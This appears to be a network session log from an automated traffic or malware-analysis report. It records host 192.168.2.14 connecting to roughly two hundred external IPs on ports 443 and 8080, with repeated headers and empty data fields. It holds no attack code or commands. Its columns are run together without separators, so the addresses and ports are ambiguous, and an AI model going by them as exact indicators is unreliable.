                                                        22224192.168.2.145254289.151.209.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22225192.168.2.1454990100.35.8.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22226192.168.2.1458474164.46.87.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22227192.168.2.145286884.198.234.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22228192.168.2.1443664165.169.196.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22229192.168.2.1441434109.60.114.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22230192.168.2.1447426168.187.234.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22231192.168.2.145729218.175.217.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22232192.168.2.1435208210.66.51.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22233192.168.2.145910460.102.133.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22234192.168.2.145205294.249.72.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22235192.168.2.1457856149.187.79.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22236192.168.2.1448114173.106.203.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22237192.168.2.145885219.165.136.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22238192.168.2.1433086208.244.251.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22239192.168.2.1441694133.248.187.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22240192.168.2.145623257.30.89.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22241192.168.2.1435352208.218.87.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22242192.168.2.145614243.203.36.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22243192.168.2.1454964134.77.83.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22244192.168.2.1438838136.25.126.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22245192.168.2.1455886200.153.18.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22246192.168.2.1440398133.91.57.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22247192.168.2.1448936140.206.211.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22248192.168.2.145803643.183.89.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22249192.168.2.145513020.169.244.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22250192.168.2.143424688.253.194.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22251192.168.2.146092419.73.63.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22252192.168.2.1450776199.252.127.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22253192.168.2.1436878176.249.59.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22254192.168.2.144969294.186.59.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22255192.168.2.1455684125.45.47.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22256192.168.2.1435426184.172.23.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22257192.168.2.1441592186.148.254.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22258192.168.2.1454448135.176.90.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22259192.168.2.1441614140.30.155.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22260192.168.2.1456170104.47.165.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22261192.168.2.144002089.163.63.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22262192.168.2.143538092.119.130.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22263192.168.2.1439234203.195.100.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22264192.168.2.1458992131.94.72.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22265192.168.2.1444010100.229.101.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22266192.168.2.1455468197.4.101.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22267192.168.2.1439536135.163.101.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22268192.168.2.143920470.128.169.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22269192.168.2.1458418101.189.220.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22270192.168.2.144667614.184.22.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22271192.168.2.1444532136.117.198.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22272192.168.2.14328362.151.7.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22273192.168.2.145859260.213.60.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22274192.168.2.1457596157.80.246.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22275192.168.2.1454744111.4.5.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22276192.168.2.1441406108.52.65.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22277192.168.2.145745874.234.147.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22278192.168.2.143415646.96.16.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22279192.168.2.143554057.136.158.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22280192.168.2.1444244110.159.95.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22281192.168.2.143513661.167.100.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22282192.168.2.1434410209.55.72.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22283192.168.2.144391859.164.81.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22284192.168.2.1446538145.124.222.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22285192.168.2.1458890194.41.253.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22286192.168.2.1436060100.10.148.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22287192.168.2.145430464.58.187.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22288192.168.2.145604446.53.96.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22289192.168.2.1448906187.2.69.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22290192.168.2.1447564171.157.58.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22291192.168.2.1444542219.12.141.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22292192.168.2.1457136220.228.138.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22293192.168.2.145346483.164.43.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22294192.168.2.143540025.10.222.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22295192.168.2.1447818197.135.96.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22296192.168.2.1444576144.119.156.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22297192.168.2.143361844.204.173.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22298192.168.2.1440768132.212.134.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22299192.168.2.144625664.176.0.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22300192.168.2.1437140191.20.155.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22301192.168.2.145787014.38.47.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22302192.168.2.1455358118.212.64.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22303192.168.2.144838837.168.69.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22304192.168.2.1451454157.255.122.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22305192.168.2.144484464.23.64.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22306192.168.2.144807036.143.229.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22307192.168.2.144851450.148.137.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22308192.168.2.144832098.136.80.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22309192.168.2.144232490.205.201.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22310192.168.2.1433056195.41.197.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22311192.168.2.145285085.233.140.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22312192.168.2.1437406118.189.78.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22313192.168.2.1459064142.194.4.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22314192.168.2.1433790154.233.131.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22315192.168.2.1458078154.103.179.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22316192.168.2.143616471.41.235.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22317192.168.2.144643657.10.78.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22318192.168.2.1443212170.164.50.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22319192.168.2.1440910126.53.25.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22320192.168.2.1449948212.13.85.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22321192.168.2.1452954125.237.48.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22322192.168.2.1433930164.225.193.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22323192.168.2.145732694.188.239.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22324192.168.2.1440780147.189.167.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22325192.168.2.1444046151.24.116.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22326192.168.2.1448514170.116.218.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22327192.168.2.145472219.252.30.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22328192.168.2.1436828169.218.48.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22329192.168.2.145794476.173.66.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22330192.168.2.1436290109.80.56.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22331192.168.2.1439740132.8.156.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22332192.168.2.144019890.125.234.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22333192.168.2.1444646222.53.113.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22334192.168.2.143786632.81.155.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22335192.168.2.143674877.215.156.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22336192.168.2.1460408199.71.221.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22337192.168.2.1456704208.247.20.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22338192.168.2.1436148194.108.214.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22339192.168.2.146085423.113.118.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22340192.168.2.145102018.182.83.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22341192.168.2.1433100158.39.131.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22342192.168.2.145709840.56.95.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22343192.168.2.1446664149.162.248.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22344192.168.2.144890862.205.45.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22345192.168.2.1440342177.90.202.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22346192.168.2.1435448199.0.150.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22347192.168.2.1458242194.184.254.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22348192.168.2.14525464.232.185.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22349192.168.2.143990067.150.53.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22350192.168.2.1439238160.66.240.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22351192.168.2.144118483.70.89.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22352192.168.2.1458708161.35.68.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22353192.168.2.145975682.174.226.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22354192.168.2.1442700161.104.242.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22355192.168.2.143628884.34.71.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22356192.168.2.1433806163.192.15.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22357192.168.2.143789418.115.105.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22358192.168.2.14569945.166.142.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22359192.168.2.1438872100.18.136.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22360192.168.2.1435652124.19.120.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22361192.168.2.1448058209.144.163.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22362192.168.2.14458701.188.40.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22363192.168.2.145024074.29.3.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22364192.168.2.1436512124.75.172.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22365192.168.2.145105061.108.114.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22366192.168.2.1446726103.147.147.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22367192.168.2.144061035.186.251.2248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22368192.168.2.14589545.182.224.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22369192.168.2.145264460.249.20.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22370192.168.2.1460244223.98.16.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22371192.168.2.1454590122.178.164.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22372192.168.2.144744471.186.8.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22373192.168.2.1433730171.104.239.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22374192.168.2.1457424206.100.237.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22375192.168.2.1460268205.150.209.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22376192.168.2.1436846126.21.204.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22377192.168.2.1440026221.207.133.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22378192.168.2.143993680.83.161.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22379192.168.2.1439772196.71.249.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22380192.168.2.1439236107.168.176.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22381192.168.2.1448762143.189.30.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22382192.168.2.1441048180.224.91.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22383192.168.2.1442874131.149.187.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22384192.168.2.1443886161.221.178.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22385192.168.2.1459816190.39.55.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22386192.168.2.144218894.176.217.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22387192.168.2.145136441.255.121.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22388192.168.2.143954265.243.7.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22389192.168.2.145706688.86.211.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22390192.168.2.1448284184.248.51.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22391192.168.2.144889251.74.86.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22392192.168.2.1443690113.17.123.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22393192.168.2.1436364170.200.42.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22394192.168.2.1455632162.239.160.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22395192.168.2.1438722171.36.58.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22396192.168.2.143934060.72.146.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22397192.168.2.1447184129.213.194.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22398192.168.2.143280863.143.144.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22399192.168.2.1456064141.221.177.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22400192.168.2.1449572154.138.197.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22401192.168.2.145675041.235.178.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22402192.168.2.1454344100.18.43.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22403192.168.2.1451962143.188.83.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22404192.168.2.1455136213.174.210.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22405192.168.2.1437574103.200.235.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22406192.168.2.1452076195.180.6.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22407192.168.2.1446858208.70.2.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22408192.168.2.1437972126.94.236.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22409192.168.2.1440256116.52.81.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22410192.168.2.144419494.177.129.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22411192.168.2.1453622139.244.217.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22412192.168.2.144561423.171.148.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22413192.168.2.1435794147.124.7.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22414192.168.2.144541858.38.75.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22415192.168.2.145174839.155.80.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22416192.168.2.145598864.18.230.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22417192.168.2.1457772223.205.114.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22418192.168.2.1434492221.63.54.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22419192.168.2.1454182158.18.91.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22420192.168.2.1441864218.126.191.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22421192.168.2.143562276.184.181.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22422192.168.2.145047618.51.137.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22423192.168.2.143668825.51.234.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22424192.168.2.1441092116.145.71.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22425192.168.2.144001238.219.79.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22426192.168.2.144560618.84.254.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22427192.168.2.1436736191.182.109.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22428192.168.2.1452380167.206.76.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22429192.168.2.144763079.83.56.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22430192.168.2.1451046136.122.153.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22431192.168.2.1452674194.143.66.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22432192.168.2.143473634.219.51.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22433192.168.2.1436116209.187.191.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22434192.168.2.1451458157.130.7.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22435192.168.2.1445864199.216.46.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22436192.168.2.144813820.218.175.252443
